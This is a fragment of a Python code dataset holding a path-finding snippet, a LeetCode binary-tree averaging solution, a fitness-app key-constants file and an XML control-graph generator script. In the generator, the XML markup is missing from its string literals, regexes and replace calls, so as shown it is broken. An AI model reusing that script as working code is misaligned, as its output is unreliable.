start)\n res = []\n now = end\n while now != start:\n res.append(now)\n now = previous[now]\n res.append(start)\n res.reverse()\n with open('out.txt', 'w') as out:\n counter = 1\n for step in res:\n if counter != len(res):\n out.write(step + '\\n')\n counter += 1\n else:\n out.write(step)\n","sub_path":"1-й семестр/problem_two/main_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"638674379","text":"'''\n\n637. Average of Levels in Binary Tree\n\nGiven a non-empty binary tree, return the average value of the nodes on each level in the form of an array.\n\nExample 1:\n\nInput:\n\n 3\n / \\\n 9 20\n / \\\n 15 7\n\nOutput: [3, 14.5, 11]\n\nExplanation:\n\nThe average value of nodes on level 0 is 3, on level 1 is 14.5, and on level 2 is 11. \n\nHence return [3, 14.5, 11].\n\nNote:\n\nThe range of node's value is in the range of 32-bit signed integer.\n\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\nclass Solution(object):\n def averageOfLevels(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if root is None:\n return []\n queue = deque()\n result = []\n queue.append(root)\n while queue:\n size = len(queue)\n sum = 0.0\n for index in xrange(size):\n cur = queue.popleft()\n sum += cur.val\n if cur.left:\n queue.append(cur.left)\n if cur.right:\n queue.append(cur.right)\n result.append(sum / size)\n return result\n","sub_path":"637.AverageofLevelsinBinaryTree.py","file_name":"637.AverageofLevelsinBinaryTree.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"220581368","text":"# -*- coding: utf-8 -*-\n# \n# # MIT License\n# \n# Copyright (c) 2019 Mike Simms\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\"\"\"Key strings for all key/value pairs used in the app\"\"\"\n\n# Keys associated with user management.\nSESSION_KEY = '_straen_username'\nDATABASE_ID_KEY = \"_id\"\nUSERNAME_KEY = \"username\" # Login name for a user\nPASSWORD_KEY = \"password\" # User's password\nPASSWORD1_KEY = \"password1\" # User's password when creating an account\nPASSWORD2_KEY = \"password2\" # User's confirmation password when creating an account\nDEVICE_KEY = \"device\" # Unique identifier for the device which is recording the activity\nDEVICES_KEY = \"devices\" # List of device identifiers\nREALNAME_KEY = \"realname\" # User's real name\nHASH_KEY = \"hash\" # Password hash\nFRIEND_REQUESTS_KEY = \"friend_requests\"\nFRIENDS_KEY = \"friends\"\nREQUESTING_USER_KEY = \"requesting_user\"\nPR_KEY = \"pr\" # Personal record\nEMAIL_KEY = \"email\" # User's email\nTARGET_EMAIL_KEY = \"target_email\" # Email address of another user\n\n# User settings\nDEFAULT_PRIVACY = \"default privacy\"\nPREFERRED_UNITS_KEY = \"preferred units\"\nUNITS_METRIC_KEY = \"metric\"\nUNITS_STANDARD_KEY = \"standard\"\nBIRTHDAY_KEY = \"birthday\"\nDEFAULT_BIRTHDAY = \"315532800\"\nHEIGHT_KEY = \"height\"\nDEFAULT_HEIGHT = \"1.8\"\nWEIGHT_KEY = \"weight\" # User's weight (kilograms)\nDEFAULT_WEIGHT = \"70\"\nGENDER_KEY = \"gender\"\nGENDER_MALE_KEY = \"male\"\nGENDER_FEMALE_KEY = \"female\"\nRESTING_HEART_RATE_KEY = \"resting heart rate\"\nESTIMATED_MAX_HEART_RATE_KEY = \"estimated max heart rate\"\nESTIMATED_FTP_KEY = \"estimated ftp\"\nPREFERRED_LONG_RUN_DAY_KEY = \"preferred long run day\" # Day of the week on which the user prefers to do their long runs\nGOAL_TYPE_KEY = \"goal type\" # Extra info about the user's goal, such as whether they care about speed or just finishing a race\nGOAL_TYPE_COMPLETION = \"Completion\"\nGOAL_TYPE_SPEED = \"Speed\"\n\n# Personal records\nRECORDS_USER_ID = \"user_id\"\nRECORD_NAME = \"record_name\"\nPERSONAL_RECORDS = \"records\"\n\n# Workout plans\nWORKOUT_PLAN_USER_ID_KEY = \"user_id\"\nWORKOUT_PLAN_CALENDAR_ID_KEY = \"calendar id\"\nWORKOUT_LIST_KEY = \"workouts\"\nWORKOUT_ID_KEY = \"workout_id\"\nWORKOUT_TYPE_KEY = \"type\"\nWORKOUT_DESCRIPTION_KEY = \"description\"\nWORKOUT_SPORT_TYPE_KEY = \"sport type\"\nWORKOUT_WARMUP_KEY = \"warmup\"\nWORKOUT_INTERVALS_KEY = \"intervals\"\nWORKOUT_COOLDOWN_KEY = 
\"cooldown\"\nWORKOUT_SCHEDULED_TIME_KEY = \"scheduled time\"\n\n# Workout types\nWORKOUT_TYPE_REST = \"Rest\"\nWORKOUT_TYPE_EVENT = \"Event\"\nWORKOUT_TYPE_SPEED_RUN = \"Speed Run\"\nWORKOUT_TYPE_INTERVAL_SESSION = \"Interval Session\"\nWORKOUT_TYPE_TEMPO_RUN = \"Tempo Run\"\nWORKOUT_TYPE_EASY_RUN = \"Easy Run\"\nWORKOUT_TYPE_HILL_REPEATS = \"Hill Repeats\" # 4-10 repeats, depending on skill level, done at 5K pace\nWORKOUT_TYPE_MIDDLE_DISTANCE_RUN = \"Middle Distance Run\" # 2 hour run for advanced distance runners\nWORKOUT_TYPE_LONG_RUN = \"Long Run\"\nWORKOUT_TYPE_OPEN_WATER_SWIM = \"Open Water Swim\"\nWORKOUT_TYPE_POOL_WATER_SWIM = \"Pool Swim\"\n\n# Keys associated with uploading data\nUPLOADED_FILE_NAME_KEY = \"uploaded_file_name\"\nUPLOADED_FILE_DATA_KEY = \"uploaded_file_data\"\n\n# Keys inherited from the mobile app. Some of these are also used by the web app.\nAPP_NAME_KEY = \"Name\"\nAPP_TIME_KEY = \"Time\"\nAPP_USERNAME_KEY = \"User Name\"\nAPP_DEVICE_ID_KEY = \"DeviceId\"\nAPP_ID_KEY = \"ActivityId\"\nAPP_TYPE_KEY = \"ActivityType\"\nAPP_DISTANCE_KEY = \"Distance\"\nAPP_DURATION_KEY = \"Duration\"\nAPP_CADENCE_KEY = \"Cadence\" # Raw cadence list.\nAPP_TEMP_KEY = \"Temperature\"\nAPP_CURRENT_SPEED_KEY = \"Current Speed\"\nAPP_AVG_SPEED_KEY = \"Avgerage Speed\"\nAPP_MOVING_SPEED_KEY = \"Moving Speed\" \nAPP_SPEED_VARIANCE_KEY = \"Speed Variance\"\nAPP_HEART_RATE_KEY = \"Heart Rate\" # Raw heart rate list.\nAPP_AVG_HEART_RATE_KEY = \"Average Heart Rate\" # Computed average heart rate.\nAPP_CURRENT_PACE_KEY = \"Current Pace\" # Computed pace list.\nAPP_POWER_KEY = \"Power\" # Raw power data list.\nAPP_SETS_KEY = \"Sets\"\nAPP_DISTANCES_KEY = \"distances\" # Distance between data points.\nAPP_LOCATIONS_KEY = \"locations\" # Raw position data.\nAPP_LOCATION_LAT_KEY = \"Latitude\"\nAPP_LOCATION_LON_KEY = \"Longitude\"\nAPP_LOCATION_ALT_KEY = \"Altitude\"\nAPP_ACCELEROMETER_KEY = \"accelerometer\" # Raw accelerometer list.\nAPP_AXIS_NAME_X = \"x\"\nAPP_AXIS_NAME_Y = \"y\"\nAPP_AXIS_NAME_Z = \"z\"\n\nLOCATION_LAT_KEY = \"latitude\"\nLOCATION_LON_KEY = \"longitude\"\nLOCATION_ALT_KEY = \"altitude\"\nLOCATION_TIME_KEY = \"time\"\n\nACCELEROMETER_AXIS_NAME_X = \"x\"\nACCELEROMETER_AXIS_NAME_Y = \"y\"\nACCELEROMETER_AXIS_NAME_Z = \"z\"\nACCELEROMETER_TIME_KEY = \"time\"\n\n# Keys used exclusively by the web app.\nACTIVITY_ID_KEY = \"activity_id\" # Unique identifier for the activity\nACTIVITY_HASH_KEY = \"activity_hash\"\nACTIVITY_TYPE_KEY = \"activity_type\"\nACTIVITY_DESCRIPTION_KEY = \"description\"\nACTIVITY_USER_ID_KEY = \"user_id\"\nACTIVITY_DEVICE_STR_KEY = \"device_str\"\nACTIVITY_LOCATIONS_KEY = \"locations\"\nACTIVITY_NAME_KEY = \"name\"\nACTIVITY_TIME_KEY = \"time\"\nACTIVITY_END_TIME_KEY = \"end_time\"\nACTIVITY_VISIBILITY_KEY = \"visibility\"\nACTIVITY_VISIBILITY_PUBLIC = \"public\"\nACTIVITY_VISIBILITY_PRIVATE = \"private\"\nACTIVITY_COMMENT_KEY = \"comment\"\nACTIVITY_COMMENTS_KEY = \"comments\"\nACTIVITY_COMMENTER_ID_KEY = \"commenter_id\" # User ID of the user leaving the comment on an activity\nACTIVITY_TAG_KEY = \"tag\"\nACTIVITY_TAGS_KEY = \"tags\"\nACTIVITY_SUMMARY_KEY = \"summary_data\"\nACTIVITY_EXPORT_FORMAT_KEY = \"export_format\"\nACTIVITY_NUM_POINTS = \"num_points\" \nACTIVITY_LOCATION_DESCRIPTION_KEY = \"location_description\" # Political description of the activity location (i.e., Florida)\nACTIVITY_INTERVALS = \"intervals\" # Intervals that were computed from the workout\n\n# Keys used to summarize activity data.\nBEST_SPEED = \"Best Speed\"\nBEST_PACE = 
\"Best Pace\"\nBEST_1K = \"Best 1K\"\nBEST_MILE = \"Best Mile\"\nBEST_5K = \"Best 5K\"\nBEST_10K = \"Best 10K\"\nBEST_15K = \"Best 15K\"\nBEST_HALF_MARATHON = \"Best Half Marathon\"\nBEST_MARATHON = \"Best Marathon\"\nBEST_METRIC_CENTURY = \"Best Metric Century\"\nBEST_CENTURY = \"Best Century\"\nBEST_5_SEC_POWER = \"5 Second Power\"\nBEST_12_MIN_POWER = \"12 Minute Power\"\nBEST_20_MIN_POWER = \"20 Minute Power\"\nBEST_1_HOUR_POWER = \"1 Hour Power\"\nMAX_POWER = \"Maximum Power\"\nMAX_HEART_RATE = \"Maximum Heart Rate\"\nMAX_CADENCE = \"Maximum Cadence\"\nAVG_PACE = \"Average Pace\"\nAVG_POWER = \"Average Power\"\nAVG_HEART_RATE = \"Average Heart Rate\"\nAVG_CADENCE = \"Average Cadence\"\nNORMALIZED_POWER = \"Normalized Power\"\nTHRESHOLD_POWER = \"Threshold Power\"\nINTENSITY_FACTOR = \"Intensity Factor\"\nTSS = \"TSS\" # Training Stress Score\nRTSS = \"rTSS\" # Run Training Stress Score\nVARIABILITY_INDEX = \"Variability Index\"\nCLUSTER = \"Cluster\"\nTOTAL_DISTANCE = \"Total Distance\"\nLONGEST_DISTANCE = \"Longest Distance\"\nMILE_SPLITS = \"Mile Splits\"\nKM_SPLITS = \"KM Splits\"\n\n# API-only keys.\nSECONDS = \"seconds\"\nDEVICE_LAST_HEARD_FROM = \"last_heard_from\"\n\n# Running paces.\nLONG_RUN_PACE = \"Long Run Pace\"\nEASY_RUN_PACE = \"Easy Run Pace\"\nTEMPO_RUN_PACE = \"Tempo Run Pace\"\nSPEED_RUN_PACE = \"Speed Run Pace\"\n\n# Keys used to manage gear.\nGEAR_KEY = \"gear\"\nGEAR_ID_KEY = \"gear_id\"\nGEAR_TYPE_KEY = \"type\"\nGEAR_NAME_KEY = \"name\"\nGEAR_DESCRIPTION_KEY = \"description\"\nGEAR_ADD_TIME_KEY = \"add_time\"\nGEAR_RETIRE_TIME_KEY = \"retire_time\"\nGEAR_INITIAL_DISTANCE_KEY = \"initial_distance\"\nGEAR_TYPE_BIKE = \"bike\"\nGEAR_TYPE_SHOES = \"shoes\"\nGEAR_SERVICE_HISTORY = \"service_history\"\n\n# Service record keys.\nSERVICE_RECORD_ID_KEY = \"service_id\"\nSERVICE_RECORD_DATE_KEY = \"date\"\nSERVICE_RECORD_DESCRIPTION_KEY = \"description\"\n\n# Activity types\nTYPE_UNSPECIFIED_ACTIVITY = \"Unknown\"\nTYPE_RUNNING_KEY = \"Running\"\nTYPE_HIKING_KEY = \"Hiking\"\nTYPE_WALKING_KEY = \"Walking\"\nTYPE_CYCLING_KEY = \"Cycling\"\nTYPE_MOUNTAIN_BIKING_KEY = \"Mountain Biking\"\nTYPE_OPEN_WATER_SWIMMING_KEY = \"Open Water Swimming\"\nTYPE_POOL_SWIMMING_KEY = \"Pool Swimming\"\nTYPE_PULL_UP_KEY = \"Pull Up\"\nTYPE_PUSH_UP_KEY = \"Push Up\"\nFOOT_BASED_ACTIVITIES = [ TYPE_RUNNING_KEY, TYPE_HIKING_KEY, TYPE_WALKING_KEY ]\nBIKE_BASED_ACTIVITIES = [ TYPE_CYCLING_KEY, TYPE_MOUNTAIN_BIKING_KEY ]\nSWIMMING_ACTIVITIES = [ TYPE_OPEN_WATER_SWIMMING_KEY, TYPE_POOL_SWIMMING_KEY ]\n\n# Activity names\nUNNAMED_ACTIVITY_TITLE = \"Unnamed\"\n\n# Interval workouts\nINTERVAL_REPEAT_KEY = \"Repeat\"\nINTERVAL_DISTANCE_KEY = \"Distance\"\nINTERVAL_PACE_KEY = \"Pace\"\nINTERVAL_RECOVERY_DISTANCE_KEY = \"Recovery Distance\"\nINTERVAL_RECOVERY_PACE_KEY = \"Recovery Pace\"\n\n# Goals\nGOAL_KEY = \"goal\"\nGOAL_DATE_KEY = \"goal_date\"\nGOAL_SWIM_DISTANCE_KEY = \"goal_swim_distance\"\nGOAL_BIKE_DISTANCE_KEY = \"goal_bike_distance\"\nGOAL_RUN_DISTANCE_KEY = \"goal_run_distance\"\nGOAL_FITNESS_KEY = \"Fitness\"\nGOAL_5K_RUN_KEY = \"5K Run\"\nGOAL_10K_RUN_KEY = \"10K Run\"\nGOAL_15K_RUN_KEY = \"15K Run\"\nGOAL_HALF_MARATHON_RUN_KEY = \"Half Marathon\"\nGOAL_MARATHON_RUN_KEY = \"Marathon\"\n\n# Used by the workout plan generator\nLONGEST_RUN_IN_FOUR_WEEKS_KEY = \"Longest Run In Four Weeks\"\nAGE_YEARS_KEY = \"Age In Years\"\nEXPERIENCE_LEVEL_KEY = \"Experience Level\"\nWEEKS_UNTIL_GOAL_KEY = \"Weeks Until Goal\"\n\n# Used to track deferred tasks\nDEFERRED_TASKS_USER_ID = \"user_id\"\nTASKS_KEY 
= \"tasks\"\nTASK_ID_KEY = \"task id\"\nTASK_TYPE_KEY = \"task type\"\nTASK_DETAILS_KEY = \"task details\"\nTASK_STATE_KEY = \"task state\"\nIMPORT_TASK_KEY = \"import\"\nANALYSIS_TASK_KEY = \"analysis\"\nWORKOUT_PLAN_TASK_KEY = \"workout plan\"\n\n# Things associated with deferred tasks\nLOCAL_FILE_NAME = \"local file name\"\n\nTIME_KEYS = [ BEST_1K, BEST_MILE, BEST_5K, BEST_10K, BEST_15K, BEST_HALF_MARATHON, BEST_MARATHON, BEST_METRIC_CENTURY, BEST_CENTURY ]\nDISTANCE_KEYS = [ TOTAL_DISTANCE, LONGEST_DISTANCE ]\nSPEED_KEYS = [ APP_CURRENT_SPEED_KEY, APP_AVG_SPEED_KEY, APP_MOVING_SPEED_KEY, APP_SPEED_VARIANCE_KEY, BEST_SPEED, APP_AVG_SPEED_KEY ]\nPACE_KEYS = [ APP_CURRENT_PACE_KEY, BEST_PACE, AVG_PACE, LONG_RUN_PACE, EASY_RUN_PACE, TEMPO_RUN_PACE, SPEED_RUN_PACE, INTERVAL_PACE_KEY ]\nPOWER_KEYS = [ AVG_POWER, MAX_POWER, BEST_5_SEC_POWER, BEST_12_MIN_POWER, BEST_20_MIN_POWER, BEST_1_HOUR_POWER, NORMALIZED_POWER, THRESHOLD_POWER ]\nHEART_RATE_KEYS = [ AVG_HEART_RATE, MAX_HEART_RATE ]\nCADENCE_KEYS = [ APP_CADENCE_KEY, AVG_CADENCE, MAX_CADENCE ]\nGOALS = [ GOAL_FITNESS_KEY, GOAL_5K_RUN_KEY, GOAL_10K_RUN_KEY, GOAL_15K_RUN_KEY, GOAL_HALF_MARATHON_RUN_KEY, GOAL_MARATHON_RUN_KEY ]\n\nUNSUMMARIZABLE_KEYS = [ APP_SPEED_VARIANCE_KEY, APP_DISTANCES_KEY, APP_LOCATIONS_KEY, ACTIVITY_TIME_KEY, ACTIVITY_TYPE_KEY, ACTIVITY_HASH_KEY, ACTIVITY_LOCATION_DESCRIPTION_KEY, ACTIVITY_INTERVALS, MILE_SPLITS, KM_SPLITS ]\n","sub_path":"Keys.py","file_name":"Keys.py","file_ext":"py","file_size_in_byte":11285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"302265000","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport sys\nimport fileinput\nimport os\nimport re\nfrom pathlib import Path\n\ndef get_args():\n if len( sys.argv ) != 5:\n raise IOError(\"Must get: 1. Control graph; 2. Configuration file; 3. Source PLPs folder; 4. Tree depth.\")\n\n #\n file_control_graph_input_path = sys.argv[1]\n print( \"argument: file_control_graph_input_path : \" + file_control_graph_input_path )\n\n\n file_configuration_input_path = sys.argv[2]\n print( \"argument: file_configuration_input_path : \" + file_configuration_input_path )\n\n plps_path = sys.argv[3]\n print( \"argument: file_source_plp_input_path : \" + plps_path )\n\n depth_number = int(sys.argv[4])\n\n if os.path.exists(file_control_graph_input_path):\n print( \"found: file_control_graph_input_path : \" + file_control_graph_input_path )\n file_control_graph_input = open( file_control_graph_input_path, 'r+' )\n else:\n raise ImportError( \"file_control_graph_input_path file does not exists: \" + file_control_graph_input_path )\n\n if os.path.exists(file_configuration_input_path):\n print( \"found: file_configuration_input_path : \" + file_configuration_input_path )\n file_configuration_input = open( file_configuration_input_path, 'r+' )\n else:\n raise ImportError( \"file_configuration_input_path file does not exists: \" + file_configuration_input_path )\n\n if os.path.exists(plps_path):\n print( \"found: plps_path : \" + plps_path )\n #file_source_plp_input = open( file_source_plps_input_path, 'rt' )\n else:\n raise ImportError( \"plps_path folder does not exists: \" + plps_path )\n\n ''' \n plp_name = re.search(\"(.*/)([^/]*)\\.xml\",\n file_source_plps_input_path, re.DOTALL)\n \n if ( None != plp_name ):\n plps_path = plp_name[1]\n plp_name = plp_name[2]\n print(\"plps_path: \" + plps_path)\n print(\"plp_name: \" + plp_name)\n '''\n\n return file_control_graph_input, file_configuration_input, plps_path, depth_number\n\ndef open_plp( plps_directory, plp_name):\n path_to_plp = os.path.join( plps_directory, plp_name )\n if os.path.exists(path_to_plp):\n print( \"open plp : \" + path_to_plp )\n plp_file = open( path_to_plp, 'rt' )\n else:\n raise ImportError( \"can not openplp: \" + path_to_plp )\n\n return plp_file\n\ndef create_probability_tree( depth, root_index, free_index, list_leafs_indexes, text ):\n if depth < 1:\n return [ free_index, text ]\n\n elif depth == 1:\n reserved_couple_indexes = free_index\n text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n ' \\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n list_leafs_indexes.append(reserved_couple_indexes)\n list_leafs_indexes.append(reserved_couple_indexes+1)\n return [ free_index+2, text ]\n\n elif depth >= 1:\n reserved_couple_indexes = free_index\n text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n ' \\n').format(index_father=root_index,index_son_left=reserved_couple_indexes,index_son_right=reserved_couple_indexes+1)\n\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes, free_index + 2, list_leafs_indexes, text)\n free_index, text = create_probability_tree(depth - 1, reserved_couple_indexes + 1, free_index, list_leafs_indexes, text)\n\n return [ free_index, text ]\n\n\ndef main( single_node = True ):\n if sys.version_info[0] < 3: # Python 2 needs utf-8\n reload(sys)\n sys.setdefaultencoding('utf-8')\n\n file_control_graph_input, file_configuration_input, plps_path, depth_number = get_args()\n\n plps_to_delete = [\"achieve_false_0*.xml\", 
\"achieve_true_0*.xml\", \"maintain_0*.xml\", \"observe_0*.xml\"]\n for plp_to_delete in plps_to_delete:\n for file_path in Path(plps_path).glob(plp_to_delete):\n print(\"remove: \" + str(file_path))\n os.remove(file_path)\n\n plp_name_achieve_false = \"achieve_false_xml\"\n plp_name_achieve_true = \"achieve_true_xml\"\n plp_name_maintain = \"maintain_xml\"\n plp_name_observe = \"observe_xml\"\n plp_file_achieve_false = open_plp(plps_path, plp_name_achieve_false)\n plp_file_achieve_true = open_plp(plps_path, plp_name_achieve_true)\n plp_file_maintain = open_plp(plps_path, plp_name_maintain)\n plp_file_observe = open_plp(plps_path, plp_name_observe)\n plp_text_achieve_false = plp_file_achieve_false.read()\n plp_text_achieve_true = plp_file_achieve_true.read()\n plp_text_maintain = plp_file_maintain.read()\n plp_text_observe = plp_file_observe.read()\n\n control_graph_input_text = file_control_graph_input.read()\n\n sub_flags = re.MULTILINE | re.DOTALL\n\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n control_graph_input_text = re.sub(r\"[ \\n\\r]*\", \"\", control_graph_input_text, flags=sub_flags)\n\n control_graph_input_text = re.sub(r']*\"/>', '', control_graph_input_text )\n\n text_for_configuration_variables = \"\"\n text_for_configuration_parameters = \"\"\n\n control_graph_text = \"\"\n nodes_counter = 0\n list_leafs_indexes = []\n nodes_counter, control_graph_text = create_probability_tree( depth_number, nodes_counter, nodes_counter + 1, list_leafs_indexes, control_graph_text)\n\n\n for root_index in list_leafs_indexes:\n node_maintain_index = nodes_counter\n plp_maintain_index = nodes_counter + 1\n node_sequential_observe = nodes_counter + 2\n plp_observe_index = nodes_counter + 3\n node_condition_index = nodes_counter + 4\n node_sequential_achieve_true_index = nodes_counter + 5\n node_sequential_achieve_false_index = nodes_counter + 6\n plp_achieve_true_index = nodes_counter + 7\n plp_achieve_false_index = nodes_counter + 8\n\n control_graph_text += ('\\n'\n '\\t\\n'\n '\\t\\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t \\n'\n '\\t\\t \\n'\n '\\t \\n'\n '\\t\\n'\n '\\t\\t\\n'\n '\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t\\t\\n'\n '\\t\\t\\t\\t \\n'\n '\\t\\t\\t \\n'\n '\\t\\t \\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' \\n'\n '\\n'\n '\\t \\n'\n ' ').format(node_concurrent_index=root_index,\n node_maintain_index = node_maintain_index,\n plp_maintain_index = plp_maintain_index,\n node_sequential_observe = node_sequential_observe,\n plp_observe_index = plp_observe_index,\n node_condition_index = node_condition_index,\n node_sequential_achieve_true_index = node_sequential_achieve_true_index,\n node_sequential_achieve_false_index = node_sequential_achieve_false_index,\n plp_achieve_true_index = plp_achieve_true_index,\n plp_achieve_false_index = plp_achieve_false_index)\n\n path_plp_observe = os.path.join( plps_path, \"observe_{plp_observe_index:08d}.xml\".format(plp_observe_index = plp_observe_index) )\n file_plp_observe = open(path_plp_observe, 'wt')\n current_plp_text_observe = plp_text_observe\n current_plp_text_observe = re.sub(r'\"observe_\"', 
'\"observe_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n current_plp_text_observe = re.sub(r'\"observe_goal_\"', '\"observe_goal_{plp_observe_index:08d}\"'.format(plp_observe_index = plp_observe_index), current_plp_text_observe)\n\n file_plp_observe.write( current_plp_text_observe )\n file_plp_observe.close()\n\n text_for_configuration_parameters += ' \\n'.format(plp_observe_index = plp_observe_index)\n\n\n path_plp_maintain = os.path.join(plps_path, \"maintain_{plp_maintain_index:08d}.xml\".format(plp_maintain_index=plp_maintain_index))\n file_plp_maintain = open(path_plp_maintain, 'wt')\n current_plp_text_maintain = plp_text_maintain\n current_plp_text_maintain = re.sub(r'\"maintain_\"', '\"maintain_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintaining_\"', '\"maintaining_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintain_termination_success_\"', '\"maintain_termination_success_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n current_plp_text_maintain = re.sub(r'\"maintain_termination_failure_\"', '\"maintain_termination_failure_{plp_maintain_index:08d}\"'.format(plp_maintain_index=plp_maintain_index), current_plp_text_maintain)\n\n text_for_configuration_variables += (' \\n'\n ' \\n'\n ' \\n').format(plp_maintain_index=plp_maintain_index)\n\n file_plp_maintain.write(current_plp_text_maintain)\n file_plp_maintain.close()\n\n path_plp_achieve_true = os.path.join(plps_path, \"achieve_true_{plp_achieve_true_index:08d}.xml\".format(\n plp_achieve_true_index=plp_achieve_true_index))\n file_plp_achieve_true = open(path_plp_achieve_true, 'wt')\n current_plp_text_achieve_true = plp_text_achieve_true\n current_plp_text_achieve_true = re.sub(r'\"achieve_true_\"',\n '\"achieve_true_{plp_achieve_true_index:08d}\"'.format(\n plp_achieve_true_index=plp_achieve_true_index),\n current_plp_text_achieve_true)\n\n current_plp_text_achieve_true = re.sub(r'\"maintain_\"',\n '\"maintain_{plp_maintain_index:08d}\"'.format(\n plp_maintain_index=plp_maintain_index),\n current_plp_text_achieve_true)\n\n\n file_plp_achieve_true.write(current_plp_text_achieve_true)\n file_plp_achieve_true.close()\n\n\n path_plp_achieve_false = os.path.join(plps_path, \"achieve_false_{plp_achieve_false_index:08d}.xml\".format(\n plp_achieve_false_index=plp_achieve_false_index))\n file_plp_achieve_false = open(path_plp_achieve_false, 'wt')\n current_plp_text_achieve_false = plp_text_achieve_false\n current_plp_text_achieve_false = re.sub(r'\"achieve_false_\"',\n '\"achieve_false_{plp_achieve_false_index:08d}\"'.format(\n plp_achieve_false_index=plp_achieve_false_index),\n current_plp_text_achieve_false)\n\n current_plp_text_achieve_false = re.sub(r'\"maintain_\"',\n '\"maintain_{plp_maintain_index:08d}\"'.format(\n plp_maintain_index=plp_maintain_index),\n current_plp_text_achieve_false)\n\n file_plp_achieve_false.write(current_plp_text_achieve_false)\n file_plp_achieve_false.close()\n\n nodes_counter += 9\n\n configuration_input_text = file_configuration_input.read()\n configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n configuration_input_text = re.sub(r\"]*>[ \\n\\r]*\", \"\", configuration_input_text, flags=sub_flags)\n\n\n text_for_configuration_variables += (' \\n'\n ' 
\\n' )\n # ' \\n'\n # ' \\n'\n # ' \\n')\n\n #text_for_configuration_parameters += (' \\n')\n\n configuration_input_text = configuration_input_text.replace( \"\", text_for_configuration_variables + text_for_configuration_parameters + \"\" )\n\n file_configuration_input.truncate(0) # .*\n file_configuration_input.seek(0)\n file_configuration_input.write(configuration_input_text)\n\n\n control_graph_input_text = control_graph_input_text.replace( \"\", control_graph_text + \"\" )\n\n file_control_graph_input.truncate(0) # .*\n file_control_graph_input.seek(0)\n file_control_graph_input.write(control_graph_input_text)\n\n\n plp_file_achieve_false.close()\n plp_file_achieve_true.close()\n plp_file_maintain.close()\n plp_file_observe.close()\n file_configuration_input.close()\n file_control_graph_input.close()\n print(\"Done\")\n \n \nmain(True)\n\n# Run example:\n# ./create_tree.py control_graph.xml configurations.xml plps/ 10\n","sub_path":"Examples/example_comprehensive_test/create_tree.py","file_name":"create_tree.py","file_ext":"py","file_size_in_byte":17612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
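The index bookkeeping in create_probability_tree above is easy to misread, so here is a minimal sketch of the same allocation scheme with the XML emission stubbed out (the function and variable names here are illustrative, not from the original script):

# Each call reserves a consecutive pair of child indexes, recurses into the
# left subtree first, and threads the next free index through the calls --
# the same contract as create_probability_tree's [free_index, text] return.
def allocate_tree(depth, root_index, free_index, leaf_indexes):
    if depth < 1:
        return free_index
    left, right = free_index, free_index + 1
    if depth == 1:
        leaf_indexes.extend([left, right])
        return free_index + 2
    free_index = allocate_tree(depth - 1, left, free_index + 2, leaf_indexes)
    free_index = allocate_tree(depth - 1, right, free_index, leaf_indexes)
    return free_index

leaves = []
print(allocate_tree(2, 0, 1, leaves), leaves)  # 7 [3, 4, 5, 6]

This matches how main() seeds the call with nodes_counter = 0 and free index 1, then numbers the per-leaf subtrees from the returned counter.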
